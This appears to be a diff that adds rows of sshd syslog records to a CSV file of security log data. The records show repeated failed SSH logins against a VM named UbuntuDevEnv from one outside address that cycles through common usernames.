+19784,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:12:35,UbuntuDevEnv,2019-06-06 18:12:34,auth,UbuntuDevEnv,info,Invalid user oscar from 128.199.149.61 port 50998,10792,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,oscar,128.199.149.6,50998,,
+19785,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:12:35,UbuntuDevEnv,2019-06-06 18:12:34,auth,UbuntuDevEnv,info,"Received disconnect from 128.199.149.61 port 50998:11: Normal Shutdown, Thank you for playing [preauth]",10792,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,128.199.149.6,50998,,
+19786,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:12:35,UbuntuDevEnv,2019-06-06 18:12:34,auth,UbuntuDevEnv,info,Disconnected from invalid user oscar 128.199.149.61 port 50998 [preauth],10792,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,oscar,128.199.149.6,50998,,
+19787,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:12:41,UbuntuDevEnv,2019-06-06 18:12:41,auth,UbuntuDevEnv,info,Invalid user alex from 128.199.149.61 port 55614,10802,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,alex,128.199.149.6,55614,,
+19788,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:12:41,UbuntuDevEnv,2019-06-06 18:12:41,auth,UbuntuDevEnv,info,"Received disconnect from 128.199.149.61 port 55614:11: Normal Shutdown, Thank you for playing [preauth]",10802,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,128.199.149.6,55614,,
+19789,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:12:41,UbuntuDevEnv,2019-06-06 18:12:41,auth,UbuntuDevEnv,info,Disconnected from invalid user alex 128.199.149.61 port 55614 [preauth],10802,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,alex,128.199.149.6,55614,,
+19790,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:12:48,UbuntuDevEnv,2019-06-06 18:12:47,auth,UbuntuDevEnv,info,"Received disconnect from 128.199.149.61 port 60242:11: Normal Shutdown, Thank you for playing [preauth]",10813,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,128.199.149.6,60242,,
+19791,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:12:48,UbuntuDevEnv,2019-06-06 18:12:47,auth,UbuntuDevEnv,info,Disconnected from authenticating user www-data 128.199.149.61 port 60242 [preauth],10813,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,www,128.199.149.6,60242,,
+19792,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:12:55,UbuntuDevEnv,2019-06-06 18:12:54,auth,UbuntuDevEnv,info,Invalid user jhon from 128.199.149.61 port 36650,10828,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jhon,128.199.149.6,36650,,
+19793,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:12:55,UbuntuDevEnv,2019-06-06 18:12:55,auth,UbuntuDevEnv,info,Disconnected from invalid user jhon 128.199.149.61 port 36650 [preauth],10828,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jhon,128.199.149.6,36650,,
+19794,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:12:55,UbuntuDevEnv,2019-06-06 18:12:55,auth,UbuntuDevEnv,info,"Received disconnect from 128.199.149.61 port 36650:11: Normal Shutdown, Thank you for playing [preauth]",10828,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,128.199.149.6,36650,,
+19795,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:13:02,UbuntuDevEnv,2019-06-06 18:13:02,auth,UbuntuDevEnv,info,Invalid user redmine from 128.199.149.61 port 41274,10843,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,redmine,128.199.149.6,41274,,
+19796,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:13:02,UbuntuDevEnv,2019-06-06 18:13:02,auth,UbuntuDevEnv,info,Disconnected from invalid user redmine 128.199.149.61 port 41274 [preauth],10843,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,redmine,128.199.149.6,41274,,
+19797,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:13:02,UbuntuDevEnv,2019-06-06 18:13:02,auth,UbuntuDevEnv,info,"Received disconnect from 128.199.149.61 port 41274:11: Normal Shutdown, Thank you for playing [preauth]",10843,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,128.199.149.6,41274,,
+19798,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:13:08,UbuntuDevEnv,2019-06-06 18:13:08,auth,UbuntuDevEnv,info,Invalid user dev from 128.199.149.61 port 45888,10853,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,dev,128.199.149.6,45888,,
+19799,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:13:09,UbuntuDevEnv,2019-06-06 18:13:08,auth,UbuntuDevEnv,info,Disconnected from invalid user dev 128.199.149.61 port 45888 [preauth],10853,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,dev,128.199.149.6,45888,,
+19800,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:13:09,UbuntuDevEnv,2019-06-06 18:13:08,auth,UbuntuDevEnv,info,"Received disconnect from 128.199.149.61 port 45888:11: Normal Shutdown, Thank you for playing [preauth]",10853,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,128.199.149.6,45888,,
+19801,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:13:29,UbuntuDevEnv,2019-06-06 18:13:29,auth,UbuntuDevEnv,info,Invalid user nginx from 128.199.149.61 port 59744,10902,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nginx,128.199.149.6,59744,,
+19802,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:13:29,UbuntuDevEnv,2019-06-06 18:13:29,auth,UbuntuDevEnv,info,Disconnected from invalid user nginx 128.199.149.61 port 59744 [preauth],10902,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nginx,128.199.149.6,59744,,
+19803,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:13:29,UbuntuDevEnv,2019-06-06 18:13:29,auth,UbuntuDevEnv,info,"Received disconnect from 128.199.149.61 port 59744:11: Normal Shutdown, Thank you for playing [preauth]",10902,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,128.199.149.6,59744,,
+19804,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:13:37,UbuntuDevEnv,2019-06-06 18:13:36,auth,UbuntuDevEnv,info,Invalid user andrew from 128.199.149.61 port 36140,10913,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,andrew,128.199.149.6,36140,,
+19805,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:13:37,UbuntuDevEnv,2019-06-06 18:13:36,auth,UbuntuDevEnv,info,"Received disconnect from 128.199.149.61 port 36140:11: Normal Shutdown, Thank you for playing [preauth]",10913,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,128.199.149.6,36140,,
+19806,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:13:37,UbuntuDevEnv,2019-06-06 18:13:36,auth,UbuntuDevEnv,info,Disconnected from invalid user andrew 128.199.149.61 port 36140 [preauth],10913,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,andrew,128.199.149.6,36140,,
+19807,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:13:44,UbuntuDevEnv,2019-06-06 18:13:43,auth,UbuntuDevEnv,info,Invalid user break from 128.199.149.61 port 40768,10924,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,break,128.199.149.6,40768,,
+19808,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:13:44,UbuntuDevEnv,2019-06-06 18:13:43,auth,UbuntuDevEnv,info,"Received disconnect from 128.199.149.61 port 40768:11: Normal Shutdown, Thank you for playing [preauth]",10924,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,128.199.149.6,40768,,
+19809,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:13:44,UbuntuDevEnv,2019-06-06 18:13:43,auth,UbuntuDevEnv,info,Disconnected from invalid user break 128.199.149.61 port 40768 [preauth],10924,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,break,128.199.149.6,40768,,
+19810,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:15:54,UbuntuDevEnv,2019-06-06 18:15:53,auth,UbuntuDevEnv,info,Invalid user jaher from 128.199.149.61 port 43914,11268,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jaher,128.199.149.6,43914,,
+19811,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:15:54,UbuntuDevEnv,2019-06-06 18:15:53,auth,UbuntuDevEnv,info,Disconnected from invalid user jaher 128.199.149.61 port 43914 [preauth],11268,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jaher,128.199.149.6,43914,,
+19812,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:15:54,UbuntuDevEnv,2019-06-06 18:15:53,auth,UbuntuDevEnv,info,"Received disconnect from 128.199.149.61 port 43914:11: Normal Shutdown, Thank you for playing [preauth]",11268,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,128.199.149.6,43914,,
+19813,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:16:01,UbuntuDevEnv,2019-06-06 18:16:00,auth,UbuntuDevEnv,info,Invalid user isra from 128.199.149.61 port 48540,11283,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,isra,128.199.149.6,48540,,
+19814,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:16:01,UbuntuDevEnv,2019-06-06 18:16:00,auth,UbuntuDevEnv,info,Disconnected from invalid user isra 128.199.149.61 port 48540 [preauth],11283,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,isra,128.199.149.6,48540,,
+19815,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:16:01,UbuntuDevEnv,2019-06-06 18:16:00,auth,UbuntuDevEnv,info,"Received disconnect from 128.199.149.61 port 48540:11: Normal Shutdown, Thank you for playing [preauth]",11283,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,128.199.149.6,48540,,
+19816,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:16:08,UbuntuDevEnv,2019-06-06 18:16:07,auth,UbuntuDevEnv,info,Invalid user ivan from 128.199.149.61 port 53156,11295,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ivan,128.199.149.6,53156,,
+19817,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:16:08,UbuntuDevEnv,2019-06-06 18:16:07,auth,UbuntuDevEnv,info,"Received disconnect from 128.199.149.61 port 53156:11: Normal Shutdown, Thank you for playing [preauth]",11295,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,128.199.149.6,53156,,
+19818,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:16:08,UbuntuDevEnv,2019-06-06 18:16:07,auth,UbuntuDevEnv,info,Disconnected from invalid user ivan 128.199.149.61 port 53156 [preauth],11295,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ivan,128.199.149.6,53156,,
+19819,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:16:15,UbuntuDevEnv,2019-06-06 18:16:14,auth,UbuntuDevEnv,info,Invalid user istvan from 128.199.149.61 port 57802,11318,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,istvan,128.199.149.6,57802,,
+19820,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:16:15,UbuntuDevEnv,2019-06-06 18:16:14,auth,UbuntuDevEnv,info,Disconnected from invalid user istvan 128.199.149.61 port 57802 [preauth],11318,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,istvan,128.199.149.6,57802,,
+19821,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:16:15,UbuntuDevEnv,2019-06-06 18:16:14,auth,UbuntuDevEnv,info,"Received disconnect from 128.199.149.61 port 57802:11: Normal Shutdown, Thank you for playing [preauth]",11318,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,128.199.149.6,57802,,
+19822,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:16:21,UbuntuDevEnv,2019-06-06 18:16:20,auth,UbuntuDevEnv,info,Invalid user irvin from 128.199.149.61 port 34178,11324,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,irvin,128.199.149.6,34178,,
+19823,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:16:21,UbuntuDevEnv,2019-06-06 18:16:20,auth,UbuntuDevEnv,info,Disconnected from invalid user irvin 128.199.149.61 port 34178 [preauth],11324,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,irvin,128.199.149.6,34178,,
+19824,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:16:21,UbuntuDevEnv,2019-06-06 18:16:20,auth,UbuntuDevEnv,info,"Received disconnect from 128.199.149.61 port 34178:11: Normal Shutdown, Thank you for playing [preauth]",11324,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,128.199.149.6,34178,,
+19825,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:16:28,UbuntuDevEnv,2019-06-06 18:16:28,auth,UbuntuDevEnv,info,Invalid user irwan from 128.199.149.61 port 38804,11334,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,irwan,128.199.149.6,38804,,
+19826,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:16:28,UbuntuDevEnv,2019-06-06 18:16:28,auth,UbuntuDevEnv,info,Disconnected from invalid user irwan 128.199.149.61 port 38804 [preauth],11334,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,irwan,128.199.149.6,38804,,
+19827,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:16:28,UbuntuDevEnv,2019-06-06 18:16:28,auth,UbuntuDevEnv,info,"Received disconnect from 128.199.149.61 port 38804:11: Normal Shutdown, Thank you for playing [preauth]",11334,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,128.199.149.6,38804,,
+19828,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:16:36,UbuntuDevEnv,2019-06-06 18:16:35,auth,UbuntuDevEnv,info,Invalid user ismael from 128.199.149.61 port 43426,11351,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ismael,128.199.149.6,43426,,
+19829,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:16:36,UbuntuDevEnv,2019-06-06 18:16:36,auth,UbuntuDevEnv,info,Disconnected from invalid user ismael 128.199.149.61 port 43426 [preauth],11351,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ismael,128.199.149.6,43426,,
+19830,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:16:36,UbuntuDevEnv,2019-06-06 18:16:36,auth,UbuntuDevEnv,info,"Received disconnect from 128.199.149.61 port 43426:11: Normal Shutdown, Thank you for playing [preauth]",11351,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,128.199.149.6,43426,,
+19831,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:16:42,UbuntuDevEnv,2019-06-06 18:16:41,auth,UbuntuDevEnv,info,Invalid user isiah from 128.199.149.61 port 48054,11361,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,isiah,128.199.149.6,48054,,
+19832,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:16:42,UbuntuDevEnv,2019-06-06 18:16:41,auth,UbuntuDevEnv,info,"Received disconnect from 128.199.149.61 port 48054:11: Normal Shutdown, Thank you for playing [preauth]",11361,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,128.199.149.6,48054,,
+19833,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:16:42,UbuntuDevEnv,2019-06-06 18:16:41,auth,UbuntuDevEnv,info,Disconnected from invalid user isiah 128.199.149.61 port 48054 [preauth],11361,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,isiah,128.199.149.6,48054,,
+19834,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:16:49,UbuntuDevEnv,2019-06-06 18:16:49,auth,UbuntuDevEnv,info,Invalid user john from 128.199.149.61 port 52688,11377,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,john,128.199.149.6,52688,,
+19835,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:16:49,UbuntuDevEnv,2019-06-06 18:16:49,auth,UbuntuDevEnv,info,"Received disconnect from 128.199.149.61 port 52688:11: Normal Shutdown, Thank you for playing [preauth]",11377,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,128.199.149.6,52688,,
+19836,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:16:49,UbuntuDevEnv,2019-06-06 18:16:49,auth,UbuntuDevEnv,info,Disconnected from invalid user john 128.199.149.61 port 52688 [preauth],11377,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,john,128.199.149.6,52688,,
+19837,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:16:55,UbuntuDevEnv,2019-06-06 18:16:55,auth,UbuntuDevEnv,info,Invalid user james from 128.199.149.61 port 57296,11391,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,james,128.199.149.6,57296,,
+19838,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:16:56,UbuntuDevEnv,2019-06-06 18:16:55,auth,UbuntuDevEnv,info,"Received disconnect from 128.199.149.61 port 57296:11: Normal Shutdown, Thank you for playing [preauth]",11391,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,128.199.149.6,57296,,
+19839,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:16:56,UbuntuDevEnv,2019-06-06 18:16:55,auth,UbuntuDevEnv,info,Disconnected from invalid user james 128.199.149.61 port 57296 [preauth],11391,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,james,128.199.149.6,57296,,
+19840,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:17:03,UbuntuDevEnv,2019-06-06 18:17:02,auth,UbuntuDevEnv,info,Invalid user jade from 128.199.149.61 port 33690,11411,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jade,128.199.149.6,33690,,
+19841,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:17:03,UbuntuDevEnv,2019-06-06 18:17:02,auth,UbuntuDevEnv,info,Disconnected from invalid user jade 128.199.149.61 port 33690 [preauth],11411,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jade,128.199.149.6,33690,,
+19842,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:17:03,UbuntuDevEnv,2019-06-06 18:17:02,auth,UbuntuDevEnv,info,"Received disconnect from 128.199.149.61 port 33690:11: Normal Shutdown, Thank you for playing [preauth]",11411,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,128.199.149.6,33690,,
+19843,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:17:10,UbuntuDevEnv,2019-06-06 18:17:09,auth,UbuntuDevEnv,info,Invalid user jay from 128.199.149.61 port 38308,11423,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jay,128.199.149.6,38308,,
